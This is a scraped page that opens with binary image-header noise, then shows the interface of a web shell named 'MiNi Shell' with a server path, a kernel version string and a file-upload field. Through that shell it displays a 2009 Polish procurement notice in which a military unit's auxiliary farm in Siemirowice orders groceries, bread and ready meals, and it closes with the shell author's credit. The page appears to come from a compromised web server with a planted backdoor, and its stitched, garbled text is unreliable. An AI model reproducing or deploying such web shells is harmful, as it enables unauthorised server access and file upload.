JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/80912-N-2009.html

<p class="kh_header"><b>Siemirowice: dostawa artykułów ogólnospożywczych</b><br>
<b>Numer ogłoszenia: 80912 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielobranżowe Gospodarstwo Pomocnicze "ISKRA" przy Jednostce Wojskowej 4653 , 84-313 Siemirowice, woj. pomorskie, tel. 0-59 8614411, faks 0-59 8614186.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gospodarstwo pomocnicze.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów ogólnospożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa artykułów ogólnospożywczych 
Zamawiający dopuszcza składanie ofert częściowych w zakresie poszczególnych zadań.
Liczba zadań - 3.
Szczegółowy opis ilości i przedmiotu zamówienia dla każdej  z części zawarty jest w załącznikach:

zadanie nr 1 - dostawa artykułów ogólnospożywczych - załącznik nr 2 do SIWZ
CPV15800000-6 Różne produkty spożywcze
CPV 15300000-1 Owoce, warzywa i podobne produkty
CPV 15400000-2 Oleje i tłuszcze zwierzęce lub roślinne
CPV 15600000-4 Produkty przemiału ziarna, skrobi i produktów skrobiowych
Cukier biały kryształ 	1kg	Kg	560		
Makaron różny	500g	Kg	560		
Kawa sypana typu Premium	250g	Kg	100		
Kawa sypana typu  Premium	80g	Kg	32		
Kawa sypana typu taka czarna	250g	Kg	28		
Kawa sypana typu felings	250g	Kg	30		
Kawa sypana typu felings	80g	Kg	32		
Kawa rozpuszczalna typu Nescafe 	100g sloik 	Kg	30		
Herbata ekspresowa	torebka	Kg	11		
Musztarda	190g słoik 	Kg	100		
Ocet	1l butelka	L	84		
Ketchup	500g	Kg	228		
Majonez	400ml sloik	Kg	192		
Suszone ziele majeranku	20g torebka	Kg	10		
Papryka mielona	20g torebka	Kg	5		
Przyprawa typu Vegeta	200g	Kg	58		
Przyprawa do zup w płynie	1l butelka	L	440		
Pieprz czarny mielony	20g torebka	Kg	14		
Kminek	20g torebka	Kg	2,5		
Liście laurowe	20g torebka	Kg	1,5		
Bulion	10g kostka	Kg	88		
Ziele angielskie	20g torebka	Kg	3		
Sosy do sałatek	9g torebka	Kg	5		
Kwasek cytrynowy spożywczy	20g torebka	Kg	3		
Żelatyna spożywcza wieprzowa	50g torebka	Kg	14		
Sól warzona spożywcza jodowana	1kg	Kg	260		
Śmietanka do kawy i herbaty	4g saszetka	Kg	2,5		
Czekolada nadziewana typu Alpen Gold	100g	Kg	3		
Czekolada mleczna typu Milka	100g	Kg	3		
Czekolada gorzka typu Alpen Gold	100g	Kg	3		
Czekolada z orzechami typu Alpen Gold	100g	Kg	3		
Czekolada z bakaliami typu Milka	100g	Kg	3		
Baton z nugatowym nadzieniem w mlecznej czekoladzie typu Snickers	55g	Kg	148		
Batonik z nadzieniem w mlecznej czekoladzie typu Pawełek	45g	Kg	44		
Wafel przekładany kremem w czekoladzie typu Grzesiek	39g	Kg	400		
Ciastka-biszkopty z galaretką oblane czekoladą typu Delicje szampańskie	147g	Kg	60		
Baton z nugatowym nadzieniem w mlecznej czekoladzie typu Mars	48g	Kg	40		
Nadziewany wafel z karmelem z płatkami ryżowymi w polewie kakaowej typu Lion	43g	Kg	180		
Baton w czekoladzie mlecznej z nadzieniem mlecznym i herbatnikami typu 3 bit	43g	Kg	64		
Baton z mlecznej czekolady z kokosem typu Bounty	57g	Kg	22		
Ciastka kruche paczkowane różne	160g	Kg	15		
Cukierki miętowe twarde karmelki 	100g	Kg	28		
Chipsy ziemniaczane	50g	Kg	30		
Guma do żucia listki typu Orbit	(20x5) opak.	Opak.	36		
Guma do żucia draże typu Winterfresh	(30x10) opak.	Opak.	36		
Paluszki solone typu Beskidzkie	70g	Kg	16		
Orzeszki solone	50g	Kg	20		
Draże różne typu Skawa	100g	Kg	16		
Ciasteczka oblane karmelem i mleczną czekoladą typu Twix	58g	Kg	32		
Wafle z kremem  typu Tago różne smaki	415g	Kg	120		
Wafle przekładane kremem typu Familijne różne smaki	180g	Kg	90		
Wafle nadziewane różne smaki	2,5kg	Kg	68		
Mąka ziemniaczana	1kg	Kg	400		
Kasza jęczmienna	400g	Kg	280		
Kasza gryczana prażona	400g	Kg	120		
Mąka pszenna	1kg	Kg	1000		
Ryż długoziarnisty	1kg	Kg	260		
Olej jadalny roślinny typu kujawski	1l butelka	Kg	480		
Oliwa z oliwek	1l butelka	Kg	10		
Ogórek konserwowy	900ml słoik	Kg	200		
Szczaw konserwowy	320ml słoik	Kg	120		
Kukurydza konserwowa	400g puszka	Kg	110		
Marchew kostka konserwowa	500g słoik	Kg	100		
Groszek z marchewką	470g słoik	Kg	250		
Buraki tarte	450g słoik	Kg	120		
Koncentrat pomidorowy	440g puszka	Kg	200		
Groch łuskany	400g torebka	Kg	260		
Fasola Jaś	400g torebka	Kg	220		
Papryka konserwowa	900ml słoik	Kg	220		
Dżem	300g słoik	Kg	140		
Kompot wiśniowy	900g słoik	Kg	1400		
Ananas plastry w syropie konserwowy	565g puszka	Kg	40		
Brzoskwinia polówki w syropie konserwowa	820g puszka	Kg	72		
Galaretka owocowa	90g paczka	Kg	6		
Pieczarki w zalewie	320g słoik	Kg	10		
Groszek konserwowy	400g puszka	Kg	80		

zadanie nr 2 - dostawa pieczywa, świeżych wyrobów piekarskich i ciastkarskich - załącznik nr 3 do SIWZ
CPV 15810000-9 Pieczywo, świeże wyroby piekarskie i ciastkarskie 
Bulka tarta	Kg	300
Bulka wrocławska	Kg	260
Chleb pszenny	Kg	5000
Bułki słodkie, pączki	Kg	272
Ciasta różne	Kg	232

zadanie nr 3 - dostawa dań gotowych - załącznik nr 4 do SIWZ
     CPV 15894300-4 Dania gotowe
Krokiety z kapustą i grzybami (świeże nie mrożone)	kg	80
Pierogi z kapusta i grzybami (świeże nie mrożone)	kg	440
Pierogi z mięsem (świeże nie mrożone)	kg	280
Kopytka (świeże nie mrożone)	kg	25.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.81.00.00-9, 15.89.43.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy:
1.  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień:
-  przedstawią decyzję wystawioną przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej  Inspekcji Sanitarnej (gdy podmiot nie będący  producentem pozostaje pod nadzorem PIS) o spełnieniu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami żywnościowymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów;
-	przedstawią dokument wystawiony przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej  Inspekcji Sanitarnej (gdy podmiot nie będący  producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP(dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności wykonawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów; 
2 a ponadto:
- spełniają warunki określone w art.22 ust.1
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24  ustawy Prawo Zamówień Publicznych

Zamawiający uzna, że Wykonawca spełnia warunki określone w ust.1, jeżeli złoży wymagane oświadczenia i dokumenty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust.1 Prawa Zamówień Publicznych - załącznik nr 5
2.	oświadczenie że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art.24 Prawa Zamówień Publicznych - załącznik nr  6
3.	oświadczenie, że Wykonawca nie zaleganiu z opłacaniem podatków w Urzędzie Skarbowym oraz nie zalega z opłacaniem składek na ubezpieczenie zdrowotne w Zakładzie Ubezpieczeń Społecznych lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu;- załącznik nr 7
4.	dokument wystawiony dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP (dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności wykonawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów;
5.	aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej w zakresie objętym postępowaniem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.	Zaświadczenie o posiadaniu transportu  specjalistycznego zgodnie z Rozporządzeniem  
Ministra Zdrowia z dnia 19.12.2002r w sprawie wymagań sanitarnych dotyczących środków transportu żywności ( Dz.U.Nr 21.poz.179 z 2003r).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mw.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4653, 84-313 Siemirowice, budynek nr 8, pokój nr 18.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: Jednostka Wojskowa 4653, 84-313 Siemirowice, budynek nr 8, pokój nr 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com